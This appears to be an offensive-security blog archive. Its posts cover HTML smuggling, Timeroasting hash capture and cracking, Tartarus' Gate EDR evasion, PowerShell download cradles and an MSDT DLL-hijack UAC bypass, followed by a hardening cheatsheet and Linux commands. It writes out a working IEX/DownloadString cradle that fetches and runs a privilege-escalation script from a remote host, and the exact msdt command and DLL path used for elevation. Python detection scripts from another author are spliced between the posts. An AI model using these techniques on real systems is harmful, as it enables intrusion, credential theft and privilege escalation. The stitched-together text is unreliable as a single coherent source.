Thursday, January 18, 2024

HTML Smuggling for Data Infiltration

Hello and happy new year! Today in this short blog post we will be looking at a very simple but effective attack called HTML Smuggling. Briefly put, this technique abuses HTML5 and JavaScript features to infiltrate data into, or exfiltrate data out of, a network. It would also be classified as more of a phishing attack, since it relies on human interaction if you are using it for initial access or something similar.

 
 
Jumping right in, we see the HTML and JavaScript code necessary to make this work (credit to ired.team & outflank.nl). It loads our file, base64-encoded, into an array, goes through a few other initializations, and eventually has the browser download it onto the victim's machine. (Note the two variables that need to be replaced for your own testing.)


To get the base64 of our target PE we simply run the command below:


Once we have initialized that variable with our base64 output, our HTML file is ready to be hosted on a web server and sent to our victim as a link. You will also need to have the executable file you encoded in the same directory as the HTML file you are hosting on the server.


To start up a simple HTTP server to host locally use the following command:

Once the victim browses to the server, the file will automatically be downloaded to the victim's machine, as seen in the picture below:

All that is then left is for the victim to execute the file. This is just one of many ways to infiltrate data into a network through what is almost always an open and unfiltered port. I hope you see this as something useful to add to your red teaming arsenal, cheers :)
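As an added example (not code from the post, ired.team or outflank.nl), here is a Python heuristic from the detection side that scores an HTML document for the building blocks described above: an embedded base64 payload, a Blob object and a browser download hand-off. The indicator names, the 200-character base64 floor and the two fixtures are my assumptions.

```python
"""Heuristic scan for the HTML smuggling building blocks described above.

Added example, not code from the original post, ired.team or outflank.nl.
Each indicator alone is common in legitimate web apps; the verdict only
turns suspicious when the payload-carrying pieces occur together.
"""
import re

# Indicator name -> pattern over the raw HTML/JavaScript text.
INDICATORS = {
    "atob_decode": re.compile(r"\batob\s*\("),              # base64 -> binary string
    "byte_array": re.compile(r"\bnew\s+Uint8Array\s*\("),    # bytes to wrap in a Blob
    "blob_object": re.compile(r"\bnew\s+Blob\s*\("),         # in-memory file object
    "blob_url": re.compile(r"URL\.createObjectURL\s*\("),    # blob: URL for an <a>
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob"),         # legacy IE/Edge save API
    "download_attr": re.compile(r"\.download\s*=|\bdownload\s*="),  # HTML5 download
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),          # no user gesture needed
    # A long base64 literal is the smuggled file itself (200 chars is an assumed floor).
    "large_base64": re.compile(r"[\"'][A-Za-z0-9+/]{200,}={0,2}[\"']"),
}

def score_html(text: str) -> dict:
    """Return the indicators present and whether they form a smuggling chain:
    an embedded base64 payload, turned into a Blob, delivered as a download."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    delivery = {"blob_url", "ms_save_blob", "download_attr"}
    suspicious = ("large_base64" in hits and "blob_object" in hits
                  and bool(delivery.intersection(hits)))
    return {"hits": hits, "suspicious": suspicious}

# Constructed fixtures (not real pages): fragments carrying the indicators,
# and a benign page that uses Blob/atob for an ordinary inline image.
FAKE_PAYLOAD = "QUJD" * 60   # 240 base64 chars standing in for an encoded file
SMUGGLING_FRAGMENTS = (
    "var file = '" + FAKE_PAYLOAD + "';\n"
    "var bin = atob(file); var bytes = new Uint8Array(bin.length);\n"
    "var blob = new Blob([bytes], {type: 'octet/stream'});\n"
    "a.href = URL.createObjectURL(blob); a.download = 'file'; a.click();\n"
)
BENIGN_PAGE = (
    "<img id='p'>\n<script>\n"
    "var blob = new Blob([atob(shortData)]);\n"
    "document.getElementById('p').src = URL.createObjectURL(blob);\n"
    "</script>\n"
)

if __name__ == "__main__":
    for label, doc in (("smuggling", SMUGGLING_FRAGMENTS), ("benign", BENIGN_PAGE)):
        print(label, score_html(doc))
```

Run it over mail attachments or proxy-captured HTML; the detection write-up linked below covers the same indicators from the SIEM side.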

 

:LINKS:

https://www.ired.team/offensive-security/defense-evasion/file-smuggling-with-html-and-javascript

Gemini Security - Understanding HTML Smuggling (VIDEO) 

https://micahbabinski.medium.com/html-smuggling-detection-5adefebb6841

Wednesday, November 8, 2023

Intro to Timeroasting - A New Attack Against the Network Time Protocol (NTP)

Today we will briefly cover a tool called "Timeroast" by SecuraBV which takes advantage of the Network Time Protocol (NTP) in Active Directory environments. This protocol is used when a system needs to synchronize its clock with the domain controller, and it has since been secured in response to past MiTM attacks against the protocol and system clocks. This more 'secure' feature is exactly what we'll be taking advantage of with this tool. Now although timeroasting is what you would consider a low-probability attack, it is also a low-effort attack which can be run in the background while further testing continues. Let's go ahead and cover some more of the features and details of the tool and protocol.
 

In short, the secured version of the NTP protocol includes the RID of the computer account in the NTP request, and the server adds a response that uses the NTLM hash of the requesting computer account's password as a key for the encrypted protocol communication. Using Timeroast we are able to capture these hashes as they are being communicated and potentially crack them offline with a Kali machine NOT directly connected to the domain! The tool also comes with a password cracker written in Python, which is very handy in our case, as these hash types are not supported by Hashcat and there are hashing issues with John as well.
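The request/response pairing just described is also what a defender can watch for: a legitimate domain member only ever authenticates with its own RID, while Timeroast-style enumeration asks with many different RIDs from one source. The following Python (an added example, not the post's or Timeroast's code) parses the MS-SNTP authenticator and flags such RID sweeps over constructed packets; the 10-RID threshold and the sample addresses are assumptions.

```python
"""Spot Timeroast-style RID sweeps in NTP traffic sent to a domain controller.

Added example, not code from the original post or from the Timeroast tool.
An MS-SNTP authenticated packet is a normal 48-byte NTP header followed by a
4-byte key identifier (the computer account's RID) and a 16-byte checksum,
so 68 bytes total. A real domain member only ever asks with its own RID;
a sweep asks with hundreds of different RIDs from one source address.
"""
import struct
from collections import defaultdict

NTP_HEADER_LEN = 48
MS_SNTP_AUTH_LEN = 4 + 16        # key identifier + MD5 crypto-checksum
MODE_CLIENT = 3

def parse_ms_sntp(payload: bytes):
    """Return (mode, rid, checksum) for an MS-SNTP packet, or None for any other
    UDP/123 payload (plain 48-byte SNTP, NTPv4 extension fields, garbage)."""
    if len(payload) != NTP_HEADER_LEN + MS_SNTP_AUTH_LEN:
        return None
    mode = payload[0] & 0x07
    (key_id,) = struct.unpack(">I", payload[48:52])
    rid = key_id & 0x7FFFFFFF     # MS-SNTP uses the high bit as a key-selection flag; mask it off
    return mode, rid, payload[52:68]

def flag_rid_sweeps(packets, threshold: int = 10) -> dict:
    """packets: iterable of (src_ip, payload). Returns {src_ip: distinct RIDs}
    for sources whose client requests used at least `threshold` different RIDs."""
    rids_by_src = defaultdict(set)
    for src, payload in packets:
        parsed = parse_ms_sntp(payload)
        if parsed and parsed[0] == MODE_CLIENT:
            rids_by_src[src].add(parsed[1])
    return {src: len(rids) for src, rids in rids_by_src.items() if len(rids) >= threshold}

# Constructed fixture: one domain member syncing repeatedly with its own RID,
# and one host cycling through a RID range the way an enumeration sweep does.
def _request(rid: int) -> bytes:
    header = bytes([0x1B]) + bytes(47)          # LI=0, VN=3, mode 3 (client), rest zero
    return header + struct.pack(">I", rid) + bytes(16)

SAMPLE_PACKETS = (
    [("10.0.0.21", _request(1105)) for _ in range(3)]
    + [("10.0.0.66", _request(rid)) for rid in range(1000, 1100)]
    + [("10.0.0.9", bytes([0x1B]) + bytes(47))]  # plain SNTP, no authenticator
)

if __name__ == "__main__":
    print(flag_rid_sweeps(SAMPLE_PACKETS))      # {'10.0.0.66': 100}
```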


One downside to this attack is that the actual computer names are not included when the NTP hashes are captured, only the RIDs assigned to them. While it is possible to match RIDs to computer names, we won't be covering that in this post (one quick idea would be Kerberoasting as a potential way to gather usernames in the domain). Below you can see that hashes are dumped but no usernames are included, just the corresponding RID numbers.

Gathering NTP hashes with timeroast.py

Also, certain systems were not requesting time synchronization with the domain controller at the time the tool was run, so each time you run timeroast.py you seem to gather some already-captured hashes and some new ones. You could continue to run this tool until you feel you have exhausted the list of users, or, if you are already aware of the number of existing users in the domain, keep capturing hashes until you reach that number.


Managing to crack a hash with timecrack.py


With one of the passwords actually being recovered here using a simple wordlist with the included tool timecrack.py, we can see that this attack does indeed show some promise for gathering and cracking valid network credentials. Still not knowing the username this password belongs to, we could potentially password spray these found credentials across the domain, or go another route and try to match it with an already known username we are more sure it belongs to. The choice is up to your personal skillset and creativity as to how exactly you could use these credentials to gain further access.

Happy hacking! :)
 

:LINKS:


https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf

https://github.com/SecuraBV/Timeroast


Wednesday, October 18, 2023

Bypassing EDR/AV Solutions with Tartarus' Gate - An Evolution of Halo's Gate for Direct Syscall Malware

EDRs are constantly evolving with the cat-and-mouse nature of threats, and threat actors are becoming more cognizant of the detection methods deployed. One technique EDRs currently utilize is placing 'hooks' on certain Windows API functions, such as the Nt* and Zw* functions. When a hooked function is called, the hook replaces the original syscall code path and redirects execution through the EDR, which applies certain measures to detect malicious activity.

One way to get around this security feature is direct syscalls. Simply put, the code of a direct syscall is the syscall stub, which is what forwards execution to the code in kernel mode, and which we will be exploring below:


In the above picture, the syscall instruction is what transfers the execution flow once the values are assigned to the registers. The number moved into the eax register is the syscall number, or system service number (SSN), which changes between Windows operating system and service versions.



In the second picture we also see the corresponding opcodes that come with the above syscall stub (note that 0xBA is the syscall number, or SSN, in this particular case for NtCreateProcess).


There are many ways to retrieve these syscall numbers, but today we'll be choosing Tartarus' Gate, which builds on Hell's / Halo's Gate and adds a check of the 4th byte: if it is 'E9' (a jmp opcode), we have further confirmation that the API call is hooked by the EDR.





In this picture we see Hell's Gate checking the address where the called function is loaded in memory for any hooks, as well as Tartarus' Gate checking for the 'E9' byte of the jmp instruction. If a hook is found, it checks neighboring syscalls up and down until it finds one that is unhooked, then calculates what the SSN of the hooked API function would be from the offset between where it originally started searching and the first unhooked function.

Keeping in mind this is just a small addition to Halo's Gate, EDRs are becoming more advanced at detecting (in)direct syscall techniques by checking where calls return to and where in memory the API code is executed. This is just a short example of one way to further circumvent API hooks for *certain* EDRs, and the purpose of this post is really to help develop the mindset of making simple but effective additions to existing tools when a vendor has 'caught on' to what once worked... the cat-and-mouse nature 🪤🐀

 

:LINKS:

https://github.com/boku7/AsmHalosGate/tree/main

https://blog.sektor7.net/#!res/2021/halosgate.md 

https://alice.climent-pommeret.red/posts/direct-syscalls-hells-halos-syswhispers2/

https://github.com/trickster0/TartarusGate/tree/master 

https://trickster0.github.io/posts/Halo%27s-Gate-Evolves-to-Tartarus-Gate/

Thursday, September 14, 2023

AV Evasion via PowerShell Cradles & Converting C# Binaries into PowerShell Scripts

 

In this technique we will go over how to have our payloads downloaded via HTTP and then loaded directly into memory. This is a technique to evade some current AV/EDR vendors.

How this will be done: first, we will use PowerShellArmoury, which has the script ConvertTo-Powershell.ps1 to convert any of our C# executables into PowerShell scripts (for this example we will just be using a premade script from PowerSharpPack named BadPotato which has already gone through this process), and next, through PowerShell download cradles, which simply put are single-line commands that download and execute our code, we will be able to get the script into memory without it ever touching disk! (ALL LINKS ARE BELOW)
-------------------------------------------------------------------------------------------------------------------

Once we have our tools downloaded, we can go into the PowerSharpBinaries directory and see all of the C# executables that have already been converted into PowerShell for us.




As mentioned before we'll be using BadPotato which is a C# executable for Windows 8-10 & Windows Server 2012-2019 privilege escalation.

With the commands
cat -raw .\Invoke-BadPotato.ps1
&
Invoke-BadPotato
we can see and verify that this script is working as a converted binary.



-------------------------------------------------------------------------------------------------------------------


Now how can we go about getting this PowerShell script loaded from an HTTP-hosted source and injected straight into memory, so that a file never touches disk? The answer is the tool Invoke-CradleCrafter v1.1

Using the commands


import-module .\Invoke-CradleCrafter.ps1
&
Invoke-CradleCrafter 

the tool loads up and we'll be given the choice to load the PowerShell script into memory or onto disk. By choosing memory we will see a list of available cradles to download our payload:




Choosing MEMORY\NETWEBSTRING\Invoke 2 we are given the result:

IEX ([System.Net.WebClient]::New().DownloadString('http://192.168.1.19:80/Invoke-BadPotato.ps1')) 

--> I edited the URL to match my Kali machine hosting the file. Once this command is run we can run another IN A NEW POWERSHELL INSTANCE:


Invoke-BadPotato


and we will see that our PowerShell script was indeed downloaded and run in memory successfully again!
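From the detection side, the cradle above leaves a recognisable signature in PowerShell Script Block Logging: a fetch primitive and an in-memory execute primitive in the same block. The Python below (an added example, not code from the post or Invoke-CradleCrafter) triages constructed 4104-style records; the field names and hosts are assumptions, and the first record reuses the exact cradle from the post.

```python
"""Flag PowerShell download cradles in Script Block Logging (Event ID 4104) text.

Added example, not code from the original post or from Invoke-CradleCrafter.
A cradle pairs a fetch (WebClient.DownloadString, Invoke-WebRequest, ...) with
an in-memory execute (IEX / Invoke-Expression / [scriptblock]::Create), which
is exactly what lets the payload run without touching disk. The sample
events below are constructed; the first reuses the cradle shown in the post.
"""
import re

FETCH = re.compile(
    r"\.download(?:string|data|file)\s*\(|net\.webclient|net\.http\.httpclient"
    r"|\b(?:iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|start-bitstransfer)\b",
    re.I)
EXECUTE = re.compile(r"\b(?:iex|invoke-expression)\b|\[scriptblock\]::create\s*\(", re.I)
URL = re.compile(r"""https?://[^\s'")]+""", re.I)

def analyze_scriptblock(text: str) -> dict:
    """Verdict for one script block: 'download cradle' (fetch + in-memory execute),
    'remote fetch' (fetch only, worth a look) or 'benign', plus any URLs seen."""
    fetch = bool(FETCH.search(text))
    execute = bool(EXECUTE.search(text))
    if fetch and execute:
        verdict = "download cradle"
    elif fetch:
        verdict = "remote fetch"
    else:
        verdict = "benign"
    return {"verdict": verdict, "urls": URL.findall(text)}

def triage(events):
    """events: iterable of {'host': str, 'ScriptBlockText': str}. Returns cradles only."""
    hits = []
    for ev in events:
        result = analyze_scriptblock(ev["ScriptBlockText"])
        if result["verdict"] == "download cradle":
            hits.append({"host": ev["host"], **result})
    return hits

SAMPLE_EVENTS = [  # constructed 4104-style records
    {"host": "WS01", "ScriptBlockText":
        "IEX ([System.Net.WebClient]::New().DownloadString('http://192.168.1.19:80/Invoke-BadPotato.ps1'))"},
    {"host": "WS01", "ScriptBlockText": "Invoke-BadPotato"},
    {"host": "WS02", "ScriptBlockText":
        "Invoke-WebRequest -Uri https://updates.example.invalid/list.json -OutFile list.json"},
    {"host": "WS03", "ScriptBlockText": "Get-ChildItem -Recurse C:\\Logs | Measure-Object"},
    {"host": "WS04", "ScriptBlockText": "iex (iwr http://10.9.8.7/s.ps1 -UseBasicParsing).Content"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["host"], hit["verdict"], hit["urls"])
```

The regexes catch the plain and aliased forms only; the obfuscation the post mentions later defeats them, which is why 4104 logging matters: it records the de-obfuscated block as it is executed.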


Remember, this can be done with any pre-existing PowerShell scripts or ANY other C# binary you can think of: Rubeus, Seatbelt, maybe even a DLL sideloader?

Thanks! 🙂

 

(Just as a note, you may need to obfuscate the C# source code and/or the PowerShell script if the AV/EDR you're testing detects this. There are tons of resources out there on how to do this, and it may be featured in a future blog post!)

 

:LINKS:

PowerSharpPack

BadPotato

PowerShellArmoury

Invoke-CradleCrafter 

https://www.youtube.com/watch?v=BO0bVFZJmpg (Cyber Attack & Defense)

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html


Wednesday, August 30, 2023

UAC Hijack using MSDT to Elevate Privileges

MSDT is a Microsoft command binary that according to their Windows Commands Reference Page (reference below) "Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input."
 

Using Sysinternals Suite's sigcheck.exe we can see that the binary has the autoElevate setting set to true:
sigcheck.exe -m C:\Windows\System32\msdt.exe



 

This result means that UAC auto-elevation applies to this binary. Now although this is good news, upon research this tool does not auto-elevate on its own and must call a diagnostic package, as noted above, that itself requires admin privileges.

----------------------------------------------------------------------------------

Going further, we see that the XML troubleshooting package files we need to call with MSDT are in the directory "C:\Windows\diagnostics\index", and if we run the command:


findstr /s /i /m "RequiresAdminPrivileges>True" C:\WINDOWS\diagnostics\index\*


 

then we see which troubleshooting packages require elevation themselves, which is what we need for this bypass to work.

----------------------------------------------------------------------------------

So, using the syntax for the tool (Windows Commands Reference Page), we come up with the command:


c:\windows\syswow64\msdt.exe -path C:\WINDOWS\diagnostics\index\BluetoothDiagnostic.xml -skip yes

(the -skip yes option bypasses the troubleshooting prompt and automatically starts troubleshooting)
 

and the result is an elevated instance of msdt.exe being spawned!

msdt.exe elevated instance spawned



 

----------------------------------------------------------------------------------

We also uncover that msdt.exe spawns sdiagnhost.exe with elevated privileges, which searches for the file BluetoothDiagnosticUtil.dll. Using Procmon filters we find that C:\Users\USER\AppData\Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll is one of the locations it searches for the file, and it just so happens to result in 'NAME NOT FOUND'.

This is good for two reasons: 1) this path is writable by the user; 2) it gives us elevated DLL loading by a Microsoft binary.

missing DLL to hijack

 

 ----------------------------------------------------------------------------------

Utilizing this technique we can successfully have our malicious DLL loaded by the sdiagnhost.exe process that is spawned with ELEVATED privileges from msdt.exe meaning our malicious file upon execution will now give us an elevated shell!!
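Seen from the blue side, the chain above is msdt.exe auto-elevating with a diagnostics package and then sdiagnhost.exe loading a DLL from a user-writable path. The Python below (an added example, not code from the post, sevagas or UACME) checks constructed Sysmon-like records for both signals; the event field names are assumptions, while the command line and the DLL path come from the post.

```python
"""Detect the msdt.exe -> sdiagnhost.exe DLL hijack chain in endpoint telemetry.

Added example, not code from the original post, sevagas or UACME. The event
records are constructed in a Sysmon-like shape (process create / image load);
field names are assumptions. Two signals from the post: msdt.exe launched with
a diagnostics-index package and "-skip yes" at High integrity (weak on its own,
troubleshooters do this legitimately), and sdiagnhost.exe loading a DLL from a
user-writable path (strong: system DLLs never live under C:\\Users).
"""
import re

MSDT_PACKAGE = re.compile(r"\bmsdt\.exe\b.*-path\s+\S*\\diagnostics\\index\\\S+\.xml", re.I)
SKIP_PROMPT = re.compile(r"-skip\s+yes", re.I)
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)   # anything under a profile

def detect_msdt_hijack(events):
    """Return (severity, reason, detail) tuples for suspicious events."""
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            cmd = ev["command_line"]
            if MSDT_PACKAGE.search(cmd) and SKIP_PROMPT.search(cmd) and ev.get("integrity") == "High":
                alerts.append(("low", "msdt.exe auto-elevated with a diagnostics package, prompt skipped", cmd))
        elif ev["type"] == "image_load":
            if ev["image"].lower().endswith("\\sdiagnhost.exe") and USER_WRITABLE.match(ev["loaded"]):
                alerts.append(("high", "elevated sdiagnhost.exe loaded a DLL from a user-writable path", ev["loaded"]))
    return alerts

SAMPLE_EVENTS = [  # constructed; the msdt command line and the hijack path are taken from the post
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\msdt.exe", "integrity": "High",
     "command_line": r"c:\windows\syswow64\msdt.exe -path C:\WINDOWS\diagnostics\index\BluetoothDiagnostic.xml -skip yes"},
    {"type": "process_create", "image": r"C:\Windows\System32\sdiagnhost.exe", "integrity": "High",
     "command_line": r"C:\Windows\System32\sdiagnhost.exe"},
    {"type": "image_load", "image": r"C:\Windows\System32\sdiagnhost.exe",
     "loaded": r"C:\Windows\System32\BluetoothDiagnosticUtil.dll"},   # a load from a system directory: not flagged
    {"type": "image_load", "image": r"C:\Windows\System32\sdiagnhost.exe",
     "loaded": r"C:\Users\USER\AppData\Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll"},
]

if __name__ == "__main__":
    for severity, reason, detail in detect_msdt_hijack(SAMPLE_EVENTS):
        print(severity.upper(), reason, "->", detail)
```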

 

LINKS:

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msdt - (Windows Commands Reference Page)

https://strontic.github.io/xcyclopedia/library/msdt.exe-152D4C9F63EFB332CCB134C6953C0104.html

https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass 

https://github.com/hfiref0x/UACME/tree/master

Saturday, March 26, 2022

System Security Cheatsheet



HDD / HARDWARE

-BACKUPS (Operating Systems / cfg files / Rule Sets)

-Flash BIOS (coreboot / libreboot)

-Encrypt root user directory / encrypt individual users file systems (LUKS / eCryptfs)

-Veracrypt to create hidden encrypted partitions

-Secure kernel parameters & boot options
 
-USB-port security

----------------------------------------------


SERVICES
 
-Firewall all access to web-GUIs -- disable access to config files

-Secure Cron Jobs / Windows Events 
 
-Disable Unnecessary services / daemons
 
-Ensure $path variables are set-in-stone
 
-Change normal directory of log files & secure their permissions

-Disable access to programming languages for users if NOT needed (access to /usr/bin/python3, etc.) so that tty shells can't be spawned
 
-Other shell escapes (emacs, less, view, more, vim) -- use sudoedit (can't escape)

-Limit text editing in general (cat, cut, awk, sed) --> ANYTHING used to edit a file/write to a file

-Disable username/login to SSH - require key only

----------------------------------------------

USERS / FILES

 
-Create ACLs with zero trust ---- edit $PATH variables for users to allow only very specific programs (restricted shells)

-Disable root account / logins for services (ssh / ftp)
 
-Stepdown accounts for admin privs

-Secure system log files
 
-Password policies such as limiting login count to 3

-SEARCH for files with the SUID/SGID bit set. Secure these!!

-Set 'nosuid' on /home and all other partitions, just not /boot or '/'
^^ this is the purpose of having separate partitions

-Extended file attributes (chattr) - keep important files from being overwritten or users from being added

-The fewer directories/files root owns the BETTER - anything root owns that can be exploited is exploited with ROOT privileges
--------------------
user | group | others
rwx  | rwx   | rwx
421  | 421   | 421
--------------------
e.g. 777 = rwxrwxrwx, 660 = rw-rw----
+4000 = SUID (runs with the owner's privileges, e.g. root, for anyone with execute permission)
+2000 = SGID (set group ID)
+1000 = STICKY BIT (only allows root/owner to delete/modify)
--------------------

----------------------------------------------
SECURITY TOOLS

*DISABLE access to cfg files*
 

-auditd - audits system calls / directories / file executes,reads,writes

-OpenSCAP / Nessus / OpenVAS - will scan the system based on security profiles/protocols and remediate for you

-Lynis - will scan the file system for misconfigs/vulns

-Security Onion - open-source SIEM featuring tools like Wazuh / Zui
 
-Snort & Suricata - IDS / IPS

-OPNsense & pfSense - open-source routers & firewalls with many security add-ons

-AIDE (HIDS) - file and directory integrity checker

-Crowdsec - HIDS
 
-Chainsaw - threat hunting tool based on the SIGMA ruleset
 
----------------------------------------------

ROUTER/FIREWALL/IDS RULES

-Disable ICMP replies --> Detect Nmap
 
-YARA / SIGMA rulesets
 
-Change ports / fingerprints of internet-facing services

-Security in layers
 
-MiTM detection
 
-DNS spoofing / typo squatting
 
-Login counts / unsuccessful logins
 
-Disable access to internet-facing services unless from specified IP addresses / MAC address control

-Harden against IP/MAC address spoofing
 
-Only allow specified IP addresses to connect to web services (firewall GUI/router)

Sunday, February 27, 2022

Linux Commands

 

FILE COMMANDS

nano - command-line text editor
tee - writes its input to standard output and to a file at the same time
echo - writes strings to the terminal or, with redirection, to files
grep - filters for strings within a file or across a directory
whereis - locates the binary, source and man page files for a command
which - finds which binary in $PATH will run for a command

find - 'find / -type f -name apache' - will search from '/' for files named apache

wildcard - 'find /etc -type f -name apache2.*' will search for any file named apache2 with any extension following it within the '/etc' folder

cat >> - will append input to an already existing file

touch - updates a file's modification date & can also create empty files

head & tail - view the first 10 (or a chosen number of) or last 10 (or a chosen number of) lines of text from a file

nl - will display a file with line numbers

sed - 'stream editor', will replace a string in a file with a new string (e.g. mysql -> MySQL) globally or at specific occurrences

less - pager for reading a file; can also search for a specific string within it

ln - creates a hardlink to a file

diff - shows the differences between two files
